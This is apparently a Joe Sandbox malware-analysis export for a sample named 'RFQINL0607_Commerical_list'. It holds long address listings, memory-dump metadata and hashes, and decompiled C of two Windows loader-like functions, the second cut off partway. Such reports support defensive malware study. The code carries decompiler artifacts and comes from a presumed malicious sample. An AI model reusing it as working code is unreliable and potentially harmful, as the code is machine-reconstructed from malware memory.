                                                                                                                                                                                  0x3337b426
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337b430
                                                                                                                                                                                  0x3337b430
                                                                                                                                                                                  0x3337b433
                                                                                                                                                                                  0x3337b436
                                                                                                                                                                                  0x3337b439
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337b43b
                                                                                                                                                                                  0x3337b43b
                                                                                                                                                                                  0x3337b430
                                                                                                                                                                                  0x3337b440
                                                                                                                                                                                  0x3337b443
                                                                                                                                                                                  0x3337b446
                                                                                                                                                                                  0x3337b449
                                                                                                                                                                                  0x3337b44b
                                                                                                                                                                                  0x3337b78d
                                                                                                                                                                                  0x3337b78e
                                                                                                                                                                                  0x3337b78f
                                                                                                                                                                                  0x3337b741
                                                                                                                                                                                  0x3337b741
                                                                                                                                                                                  0x3337b746
                                                                                                                                                                                  0x3337b749
                                                                                                                                                                                  0x3337b749
                                                                                                                                                                                  0x3337b74d
                                                                                                                                                                                  0x3337b75f
                                                                                                                                                                                  0x3337b764
                                                                                                                                                                                  0x3337b764
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337b74d
                                                                                                                                                                                  0x3337b451
                                                                                                                                                                                  0x3337b454
                                                                                                                                                                                  0x3337b457
                                                                                                                                                                                  0x3337b713
                                                                                                                                                                                  0x3337b71a
                                                                                                                                                                                  0x3337b71f
                                                                                                                                                                                  0x3337b725
                                                                                                                                                                                  0x3337b727
                                                                                                                                                                                  0x3337b729
                                                                                                                                                                                  0x3337b72c
                                                                                                                                                                                  0x3337b732
                                                                                                                                                                                  0x3337b735
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337b73b
                                                                                                                                                                                  0x3337b73b
                                                                                                                                                                                  0x3337b73e
                                                                                                                                                                                  0x3337b73f
                                                                                                                                                                                  0x3337b740
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337b740
                                                                                                                                                                                  0x3337b45d
                                                                                                                                                                                  0x3337b46c
                                                                                                                                                                                  0x3337b471
                                                                                                                                                                                  0x3337b47f
                                                                                                                                                                                  0x3337b481
                                                                                                                                                                                  0x3337b484
                                                                                                                                                                                  0x3337b486
                                                                                                                                                                                  0x333be374
                                                                                                                                                                                  0x333be37b
                                                                                                                                                                                  0x333be386
                                                                                                                                                                                  0x333be393
                                                                                                                                                                                  0x333be39d
                                                                                                                                                                                  0x333be3a2
                                                                                                                                                                                  0x333be3a5
                                                                                                                                                                                  0x333be3a9
                                                                                                                                                                                  0x333be3ab
                                                                                                                                                                                  0x333be3b1
                                                                                                                                                                                  0x333be3b4
                                                                                                                                                                                  0x333be3b7
                                                                                                                                                                                  0x333be3bd
                                                                                                                                                                                  0x333be3bd
                                                                                                                                                                                  0x333be3bd
                                                                                                                                                                                  0x333be3bd
                                                                                                                                                                                  0x333be3c3
                                                                                                                                                                                  0x333be3c7
                                                                                                                                                                                  0x333be3d5
                                                                                                                                                                                  0x333be3da
                                                                                                                                                                                  0x333be3da
                                                                                                                                                                                  0x333be3dd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333be3dd
                                                                                                                                                                                  0x3337b491
                                                                                                                                                                                  0x3337b493
                                                                                                                                                                                  0x3337b496
                                                                                                                                                                                  0x3337b498
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337b4a8
                                                                                                                                                                                  0x3337b4ae
                                                                                                                                                                                  0x3337b4b6
                                                                                                                                                                                  0x3337b4bb
                                                                                                                                                                                  0x3337b4c2
                                                                                                                                                                                  0x3337b4ce
                                                                                                                                                                                  0x3337b4df
                                                                                                                                                                                  0x3337b4e4
                                                                                                                                                                                  0x3337b4e7
                                                                                                                                                                                  0x3337b4ea
                                                                                                                                                                                  0x3337b4ed
                                                                                                                                                                                  0x3337b4ef
                                                                                                                                                                                  0x3337b794
                                                                                                                                                                                  0x3337b4f5
                                                                                                                                                                                  0x3337b4f5
                                                                                                                                                                                  0x3337b4f8
                                                                                                                                                                                  0x3337b4fe
                                                                                                                                                                                  0x3337b504
                                                                                                                                                                                  0x3337b504
                                                                                                                                                                                  0x3337b504
                                                                                                                                                                                  0x3337b504
                                                                                                                                                                                  0x3337b50a
                                                                                                                                                                                  0x3337b50e
                                                                                                                                                                                  0x3337b51c
                                                                                                                                                                                  0x3337b521
                                                                                                                                                                                  0x3337b521
                                                                                                                                                                                  0x3337b524
                                                                                                                                                                                  0x3337b528
                                                                                                                                                                                  0x3337b530
                                                                                                                                                                                  0x3337b533
                                                                                                                                                                                  0x3337b538
                                                                                                                                                                                  0x3337b538
                                                                                                                                                                                  0x3337b54b
                                                                                                                                                                                  0x3337b550
                                                                                                                                                                                  0x3337b553
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337b553
                                                                                                                                                                                  0x3337b3b2
                                                                                                                                                                                  0x3337b3b8
                                                                                                                                                                                  0x3337b3bb
                                                                                                                                                                                  0x3337b3c1
                                                                                                                                                                                  0x3337b3c4
                                                                                                                                                                                  0x3337b3c4
                                                                                                                                                                                  0x3337b3bb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337b3b2
                                                                                                                                                                                  0x3337b3a4
                                                                                                                                                                                  0x3337b412
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337b412
                                                                                                                                                                                  0x3337b556
                                                                                                                                                                                  0x3337b556
                                                                                                                                                                                  0x3337b559
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337b559
                                                                                                                                                                                  0x3337b26c
                                                                                                                                                                                  0x3337b26c
                                                                                                                                                                                  0x3337b26c
                                                                                                                                                                                  0x3337b26e
                                                                                                                                                                                  0x3337b271
                                                                                                                                                                                  0x3337b271
                                                                                                                                                                                  0x3337b273
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337b275
                                                                                                                                                                                  0x3337b27a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337b280
                                                                                                                                                                                  0x3337b280
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337b280
                                                                                                                                                                                  0x3337b27a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337b271
                                                                                                                                                                                  0x3337b26a

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @[D3@[D3
                                                                                                                                                                                  • API String ID: 0-3474806942
                                                                                                                                                                                  • Opcode ID: 5737bf084cd0c0918774a0c8c616b5285499efb00eded4715dfec8918588b9a3
                                                                                                                                                                                  • Instruction ID: 8a472cc412c98775dbf69304434d84065f6455209e5e378e9f29f3a6cf893ce2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5737bf084cd0c0918774a0c8c616b5285499efb00eded4715dfec8918588b9a3
                                                                                                                                                                                  • Instruction Fuzzy Hash: B632AFB5E01219DBDF14CFA8C880BEEBBB5FF84754F188129E845AB350E7799941CB90
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3337E507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                                  			E3337E507(intOrPtr* __ecx, intOrPtr* __edx) {
				char _v5;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				char _v64;
				signed int _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v88;
				signed int _t78;
				void* _t81;
				char* _t84;
				intOrPtr _t85;
				intOrPtr _t97;
				signed int _t100;
				signed int _t105;
				intOrPtr _t108;
				signed int _t116;
				signed int _t117;
				signed char* _t118;
				signed int _t125;
				signed int _t126;
				signed char* _t127;
				intOrPtr* _t131;
				char* _t132;
				intOrPtr* _t151;
				signed int _t152;
				intOrPtr _t153;
				signed int _t155;
				signed int _t156;

				_t151 = __ecx;
				_t131 = __edx;
				_v28 = __edx;
				_t153 =  *((intOrPtr*)(__ecx + 0x20));
				_v32 =  *((intOrPtr*)(__ecx + 0x60));
				if(E3337E662(__ecx, 0) != 0) {
					return 0xc000022d;
				} else {
					_t135 =  *((intOrPtr*)(_t153 + 0x18));
					_t6 = _t153 + 0x24; // 0x123
					_t78 = _t6;
					_t146 = _t78;
					_v16 = _t78;
					E3336DF36( *((intOrPtr*)(_t153 + 0x18)), _t146, 0x14a5);
					_v88 = 0x18;
					_v84 = 0;
					0x840 = 0x40;
					if( *0x33445d58 != 0) {
					}
				}
				_v76 = 0x840;
				_v80 = _t131;
				_v72 = 0;
				_v68 = 0;
				_t81 = L33363C40();
				_t132 = 0x7ffe0384;
				if(_t81 != 0) {
					_t84 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t84 = 0x7ffe0384;
				}
				if( *_t84 != 0) {
					_t85 =  *[fs:0x30];
					__eflags =  *(_t85 + 0x240) & 0x00000004;
					if(( *(_t85 + 0x240) & 0x00000004) != 0) {
						_t126 = L33363C40();
						__eflags = _t126;
						if(_t126 == 0) {
							_t127 = 0x7ffe0385;
						} else {
							_t127 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						__eflags =  *_t127 & 0x00000020;
						if(( *_t127 & 0x00000020) != 0) {
							_t146 = _t146 | 0xffffffff;
							_t135 = 0x1485;
							E333D0227(0x1485, _t146, 0xffffffff, 0xffffffff, 0, 0);
						}
					}
				}
				if(( *( *[fs:0x30] + 0x68) & 0x00040000) != 0) {
					_t135 = _v28;
					_push(0);
					_push(0);
					_push(0);
					_v48 =  *_t135;
					_v44 =  *((intOrPtr*)(_t135 + 4));
					_push(8);
					_push( &_v48);
					_push(0x26);
					E33394580();
				}
				_v24 = 0;
				while(1) {
					_push(0x60);
					_push(5);
					_push( &_v64);
					_push( &_v88);
					_push(0x100021);
					_push( &_v12);
					_t155 = L33392CE0();
					if(_t155 >= 0) {
						break;
					}
					__eflags = _t155 - 0xc0000034;
					if(_t155 == 0xc0000034) {
						L38:
						_t155 = 0xc0000135;
						L39:
						__eflags = _t155;
						if(_t155 < 0) {
							L19:
							return _t155;
						}
						break;
					}
					__eflags = _t155 - 0xc000003a;
					if(_t155 == 0xc000003a) {
						goto L38;
					}
					__eflags = _t155 - 0xc0000022;
					if(_t155 != 0xc0000022) {
						goto L39;
					}
					__eflags = _v24;
					if(__eflags != 0) {
						goto L19;
					}
					_t135 = _t151;
					_t125 = E333CFBC2(_t151, __eflags);
					__eflags = _t125;
					if(_t125 == 0) {
						goto L19;
					}
					_v24 = 1;
				}
				if( *0x33445d3c != 0) {
					_t146 = _v12;
					_t155 = E333D3ECC(_t151, _v12, _t135);
					__eflags = _t155;
					if(_t155 >= 0) {
						goto L10;
					}
					__eflags =  *0x33445d10;
					if( *0x33445d10 != 0) {
						L18:
						_push(_v12);
						E33392A80();
						goto L19;
					}
				}
				L10:
				if(( *(_t151 + 0x10) & 0x01000000) != 0) {
					_t97 =  *[fs:0x30];
					__eflags =  *(_t97 + 3) & 0x00000010;
					if(( *(_t97 + 3) & 0x00000010) != 0) {
						goto L11;
					}
					_t146 =  *(_t151 + 0x20);
					_t155 = E333D3E62(_v12,  *(_t151 + 0x20),  &_v36, 8,  &_v5);
					__eflags = _t155;
					if(_t155 < 0) {
						goto L18;
					}
				}
				L11:
				_push(_v12);
				_push(0x1000000);
				_push(0x10);
				_push(0);
				_push(0);
				_push(0xd);
				_push( &_v20);
				_t155 = E33392E50();
				if(_t155 < 0) {
					__eflags = _t155 - 0xc000047e;
					if(_t155 == 0xc000047e) {
						L56:
						_t100 = E333CC3B0(_t155);
						_t152 = _v16;
						_t155 = _t100;
						L57:
						E3338C98F(_t155, 0x1485, 0, _t152);
						goto L18;
					}
					__eflags = _t155 - 0xc000047f;
					if(_t155 == 0xc000047f) {
						goto L56;
					}
					__eflags = _t155 - 0xc0000462;
					if(_t155 == 0xc0000462) {
						goto L56;
					}
					_t152 = _v16;
					__eflags = _t155 - 0xc0000017;
					if(_t155 != 0xc0000017) {
						__eflags = _t155 - 0xc000009a;
						if(_t155 != 0xc000009a) {
							__eflags = _t155 - 0xc000012d;
							if(_t155 != 0xc000012d) {
								_v56 = _t152;
								_push( &_v40);
								_push("true");
								_v52 = _t155;
								_push( &_v56);
								_push("true");
								_push(2);
								_push(0xc000007b);
								_t105 = E33394020();
								__eflags = _t105;
								if(_t105 >= 0) {
									__eflags =  *0x334465f4 - 3;
									if( *0x334465f4 != 3) {
										 *0x33445a9c =  *0x33445a9c + 1;
									}
								}
							}
						}
					}
					goto L57;
				}
				if(L33363C40() != 0) {
					_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t132 != 0) {
					_t108 =  *[fs:0x30];
					__eflags =  *(_t108 + 0x240) & 0x00000004;
					if(( *(_t108 + 0x240) & 0x00000004) != 0) {
						_t117 = L33363C40();
						__eflags = _t117;
						if(_t117 == 0) {
							_t118 = 0x7ffe0385;
						} else {
							_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						__eflags =  *_t118 & 0x00000020;
						if(( *_t118 & 0x00000020) != 0) {
							E333D0227(0x1486, _t146 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
						}
					}
				}
				if(( *(_t151 + 0x10) & 0x00000100) != 0) {
					L21:
					__eflags = _t155;
					if(_t155 < 0) {
						goto L17;
					} else {
						goto L16;
					}
				} else {
					if( *0x334468e4 != 0) {
						_t156 =  *0x33445b64; // 0x0
						asm("ror esi, cl");
						 *0x334491e0(_v12, _v28, 0x20);
						_t116 =  *(_t156 ^  *0x7ffe0330)();
						_t70 = _t116 + 0x3ffffddb; // 0x3ffffddb
						asm("sbb esi, esi");
						_t155 =  ~_t70 & _t116;
						goto L21;
					}
					L16:
					_t155 = E33371332(_t151, _v20);
					if(_v32 != 0) {
						__eflags = _t155;
						if(_t155 < 0) {
							goto L17;
						}
						 *(_t151 + 0x64) = _v12;
						 *((intOrPtr*)(_t151 + 0xc)) = _v20;
						goto L19;
					}
					L17:
					_push(_v20);
					E33392A80();
					goto L18;
				}
			}












































                                                                                                                                                                                  0x3337e512
                                                                                                                                                                                  0x3337e514
                                                                                                                                                                                  0x3337e518
                                                                                                                                                                                  0x3337e51e
                                                                                                                                                                                  0x3337e521
                                                                                                                                                                                  0x3337e52b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337e531
                                                                                                                                                                                  0x3337e531
                                                                                                                                                                                  0x3337e534
                                                                                                                                                                                  0x3337e534
                                                                                                                                                                                  0x3337e53c
                                                                                                                                                                                  0x3337e53e
                                                                                                                                                                                  0x3337e541
                                                                                                                                                                                  0x3337e548
                                                                                                                                                                                  0x3337e558
                                                                                                                                                                                  0x3337e55b
                                                                                                                                                                                  0x3337e55c
                                                                                                                                                                                  0x3337e55c
                                                                                                                                                                                  0x3337e55c
                                                                                                                                                                                  0x3337e563
                                                                                                                                                                                  0x3337e566
                                                                                                                                                                                  0x3337e569
                                                                                                                                                                                  0x3337e56c
                                                                                                                                                                                  0x3337e56f
                                                                                                                                                                                  0x3337e574
                                                                                                                                                                                  0x3337e57b
                                                                                                                                                                                  0x333bf88f
                                                                                                                                                                                  0x3337e581
                                                                                                                                                                                  0x3337e581
                                                                                                                                                                                  0x3337e581
                                                                                                                                                                                  0x3337e586
                                                                                                                                                                                  0x333bf899
                                                                                                                                                                                  0x333bf89f
                                                                                                                                                                                  0x333bf8a6
                                                                                                                                                                                  0x333bf8ac
                                                                                                                                                                                  0x333bf8b1
                                                                                                                                                                                  0x333bf8b3
                                                                                                                                                                                  0x333bf8c5
                                                                                                                                                                                  0x333bf8b5
                                                                                                                                                                                  0x333bf8be
                                                                                                                                                                                  0x333bf8be
                                                                                                                                                                                  0x333bf8ca
                                                                                                                                                                                  0x333bf8cd
                                                                                                                                                                                  0x333bf8d9
                                                                                                                                                                                  0x333bf8dc
                                                                                                                                                                                  0x333bf8e1
                                                                                                                                                                                  0x333bf8e1
                                                                                                                                                                                  0x333bf8cd
                                                                                                                                                                                  0x333bf8a6
                                                                                                                                                                                  0x3337e599
                                                                                                                                                                                  0x333bf8eb
                                                                                                                                                                                  0x333bf8ee
                                                                                                                                                                                  0x333bf8ef
                                                                                                                                                                                  0x333bf8f0
                                                                                                                                                                                  0x333bf8f3
                                                                                                                                                                                  0x333bf8f9
                                                                                                                                                                                  0x333bf8ff
                                                                                                                                                                                  0x333bf901
                                                                                                                                                                                  0x333bf902
                                                                                                                                                                                  0x333bf904
                                                                                                                                                                                  0x333bf904
                                                                                                                                                                                  0x3337e59f
                                                                                                                                                                                  0x3337e5a2
                                                                                                                                                                                  0x3337e5a2
                                                                                                                                                                                  0x3337e5a4
                                                                                                                                                                                  0x3337e5a9
                                                                                                                                                                                  0x3337e5ad
                                                                                                                                                                                  0x3337e5ae
                                                                                                                                                                                  0x3337e5b6
                                                                                                                                                                                  0x3337e5bc
                                                                                                                                                                                  0x3337e5c0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf90e
                                                                                                                                                                                  0x333bf914
                                                                                                                                                                                  0x333bf94b
                                                                                                                                                                                  0x333bf94b
                                                                                                                                                                                  0x333bf950
                                                                                                                                                                                  0x333bf950
                                                                                                                                                                                  0x333bf952
                                                                                                                                                                                  0x3337e655
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337e655
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf958
                                                                                                                                                                                  0x333bf916
                                                                                                                                                                                  0x333bf91c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf91e
                                                                                                                                                                                  0x333bf924
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf926
                                                                                                                                                                                  0x333bf92a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf930
                                                                                                                                                                                  0x333bf932
                                                                                                                                                                                  0x333bf937
                                                                                                                                                                                  0x333bf939
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf93f
                                                                                                                                                                                  0x333bf93f
                                                                                                                                                                                  0x3337e5cd
                                                                                                                                                                                  0x333bf95d
                                                                                                                                                                                  0x333bf968
                                                                                                                                                                                  0x333bf96a
                                                                                                                                                                                  0x333bf96c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf972
                                                                                                                                                                                  0x333bf979
                                                                                                                                                                                  0x3337e64d
                                                                                                                                                                                  0x3337e64d
                                                                                                                                                                                  0x3337e650
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337e650
                                                                                                                                                                                  0x333bf97f
                                                                                                                                                                                  0x3337e5d3
                                                                                                                                                                                  0x3337e5da
                                                                                                                                                                                  0x333bf984
                                                                                                                                                                                  0x333bf98a
                                                                                                                                                                                  0x333bf98e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf994
                                                                                                                                                                                  0x333bf9a9
                                                                                                                                                                                  0x333bf9ab
                                                                                                                                                                                  0x333bf9ad
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf9b3
                                                                                                                                                                                  0x3337e5e0
                                                                                                                                                                                  0x3337e5e0
                                                                                                                                                                                  0x3337e5e6
                                                                                                                                                                                  0x3337e5eb
                                                                                                                                                                                  0x3337e5ed
                                                                                                                                                                                  0x3337e5ef
                                                                                                                                                                                  0x3337e5f1
                                                                                                                                                                                  0x3337e5f3
                                                                                                                                                                                  0x3337e5f9
                                                                                                                                                                                  0x3337e5fd
                                                                                                                                                                                  0x333bf9b8
                                                                                                                                                                                  0x333bf9be
                                                                                                                                                                                  0x333bfa1e
                                                                                                                                                                                  0x333bfa1f
                                                                                                                                                                                  0x333bfa24
                                                                                                                                                                                  0x333bfa27
                                                                                                                                                                                  0x333bfa29
                                                                                                                                                                                  0x333bfa33
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bfa33
                                                                                                                                                                                  0x333bf9c0
                                                                                                                                                                                  0x333bf9c6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf9c8
                                                                                                                                                                                  0x333bf9ce
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf9d0
                                                                                                                                                                                  0x333bf9d3
                                                                                                                                                                                  0x333bf9d9
                                                                                                                                                                                  0x333bf9db
                                                                                                                                                                                  0x333bf9e1
                                                                                                                                                                                  0x333bf9e3
                                                                                                                                                                                  0x333bf9e9
                                                                                                                                                                                  0x333bf9ee
                                                                                                                                                                                  0x333bf9f1
                                                                                                                                                                                  0x333bf9f2
                                                                                                                                                                                  0x333bf9f7
                                                                                                                                                                                  0x333bf9fa
                                                                                                                                                                                  0x333bf9fb
                                                                                                                                                                                  0x333bf9fd
                                                                                                                                                                                  0x333bf9ff
                                                                                                                                                                                  0x333bfa04
                                                                                                                                                                                  0x333bfa09
                                                                                                                                                                                  0x333bfa0b
                                                                                                                                                                                  0x333bfa0d
                                                                                                                                                                                  0x333bfa14
                                                                                                                                                                                  0x333bfa16
                                                                                                                                                                                  0x333bfa16
                                                                                                                                                                                  0x333bfa14
                                                                                                                                                                                  0x333bfa0b
                                                                                                                                                                                  0x333bf9e9
                                                                                                                                                                                  0x333bf9e1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf9d9
                                                                                                                                                                                  0x3337e60a
                                                                                                                                                                                  0x333bfa46
                                                                                                                                                                                  0x333bfa46
                                                                                                                                                                                  0x3337e613
                                                                                                                                                                                  0x333bfa51
                                                                                                                                                                                  0x333bfa57
                                                                                                                                                                                  0x333bfa5e
                                                                                                                                                                                  0x333bfa64
                                                                                                                                                                                  0x333bfa69
                                                                                                                                                                                  0x333bfa6b
                                                                                                                                                                                  0x333bfa7d
                                                                                                                                                                                  0x333bfa6d
                                                                                                                                                                                  0x333bfa76
                                                                                                                                                                                  0x333bfa76
                                                                                                                                                                                  0x333bfa82
                                                                                                                                                                                  0x333bfa85
                                                                                                                                                                                  0x333bfa9b
                                                                                                                                                                                  0x333bfa9b
                                                                                                                                                                                  0x333bfa85
                                                                                                                                                                                  0x333bfa5e
                                                                                                                                                                                  0x3337e620
                                                                                                                                                                                  0x3337e65c
                                                                                                                                                                                  0x3337e65c
                                                                                                                                                                                  0x3337e65e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337e660
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337e660
                                                                                                                                                                                  0x3337e622
                                                                                                                                                                                  0x3337e629
                                                                                                                                                                                  0x333bfaad
                                                                                                                                                                                  0x333bfac1
                                                                                                                                                                                  0x333bfac7
                                                                                                                                                                                  0x333bfacd
                                                                                                                                                                                  0x333bfacf
                                                                                                                                                                                  0x333bfad7
                                                                                                                                                                                  0x333bfad9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bfad9
                                                                                                                                                                                  0x3337e62f
                                                                                                                                                                                  0x3337e63d
                                                                                                                                                                                  0x3337e63f
                                                                                                                                                                                  0x333bfae0
                                                                                                                                                                                  0x333bfae2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bfaeb
                                                                                                                                                                                  0x333bfaf1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bfaf1
                                                                                                                                                                                  0x3337e645
                                                                                                                                                                                  0x3337e645
                                                                                                                                                                                  0x3337e648
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337e648

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e0e114cc8eec788a90771d5eaffd5c83c6d8d927b703560dc7db4322290f0b0e
                                                                                                                                                                                  • Instruction ID: 631c11e226e7291c57b27cc48b0e06767e0b49c2e06eeab27566fdcb4ef6a4fd
                                                                                                                                                                                  • Opcode Fuzzy Hash: e0e114cc8eec788a90771d5eaffd5c83c6d8d927b703560dc7db4322290f0b0e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 16A1F471E42718DFEB21CFA4C884B9D77B8AF04B64F058265E950BB6A0DB789D04CB91
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33351051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                                  			E33351051(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr* _v92;
				void* _v96;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t151;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				intOrPtr _t160;
				signed int _t161;
				signed int _t172;
				intOrPtr _t180;
				signed int _t195;
				signed int _t196;
				char _t197;
				signed int _t200;
				void* _t201;
				intOrPtr _t202;
				signed int _t204;
				intOrPtr* _t206;
				intOrPtr _t207;
				char _t209;
				signed int _t210;
				intOrPtr _t214;
				intOrPtr* _t220;
				signed int _t222;
				signed int _t223;
				intOrPtr _t226;
				intOrPtr _t227;
				void* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				intOrPtr _t238;
				signed int _t239;
				void* _t243;
				signed int _t244;
				signed int _t246;
				signed int _t247;

				_t246 = (_t244 & 0xfffffff8) - 0x6c;
				_v8 =  *0x3344b370 ^ _t246;
				_t238 = __edx;
				_t226 = __ecx;
				_v36 = 0;
				_t204 = 6;
				_t232 =  &_v84;
				_v52 =  *((intOrPtr*)(__ecx + 0x48));
				_v40 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 = __edx;
				_v48 = __ecx;
				_t151 = memset(_t232, 0, _t204 << 2);
				_t247 = _t246 + 0xc;
				_t233 = _t232 + _t204;
				if(_v52 == 2) {
					_t234 =  *(_t226 + 0x60);
					_t200 =  *(_t226 + 0x64);
					_v63 =  *((intOrPtr*)(_t226 + 0x4c));
					_t153 =  *((intOrPtr*)(_t226 + 0x58));
					_v104 = _t153;
					_v76 = _t153;
					_t154 =  *((intOrPtr*)(_t226 + 0x5c));
					_v100 = _t154;
					_v72 = _t154;
					_t155 = 0;
					L19:
					_v80 = _t200;
					_v84 = _t234;
					L8:
					if( *((intOrPtr*)(_t226 + 0x74)) > 0) {
						_t81 = _t226 + 0x84; // 0x124
						_t206 = _t81;
						_v92 = _t206;
						while(1) {
							_t207 =  *_t206;
							if(_t207 >= 0 || _t207 == 0x80000000) {
								break;
							}
							_t155 = _t155 + 1;
							_t206 = _v92 + 0x10;
							_v92 = _t206;
							if(_t155 <  *((intOrPtr*)(_t226 + 0x74))) {
								continue;
							}
							goto L9;
						}
						_v88 = _t155 << 4;
						_t239 = _v88;
						_t209 = _t226 +  *((intOrPtr*)(_t239 + _t226 + 0x78));
						_v44 = _t209;
						asm("adc eax, [esi+edx+0x7c]");
						_v24 = 0;
						_v28 = _t209;
						_v20 =  *((intOrPtr*)(_t239 + _t226 + 0x80));
						_t160 =  *_v92;
						_v36 =  &_v28;
						_t238 = _v32;
						_v16 = _t160;
						if( *(_t226 + 0x4e) >= 0 || _t160 != 0x80000000) {
							goto L9;
						} else {
							 *((intOrPtr*)(_t209 + 8)) = 0;
							 *((intOrPtr*)(_t209 + 0xc)) = 0;
							 *((intOrPtr*)(_t209 + 0x14)) = 0;
							 *((intOrPtr*)(_t209 + 0x10)) = _v20;
							_t214 = 0;
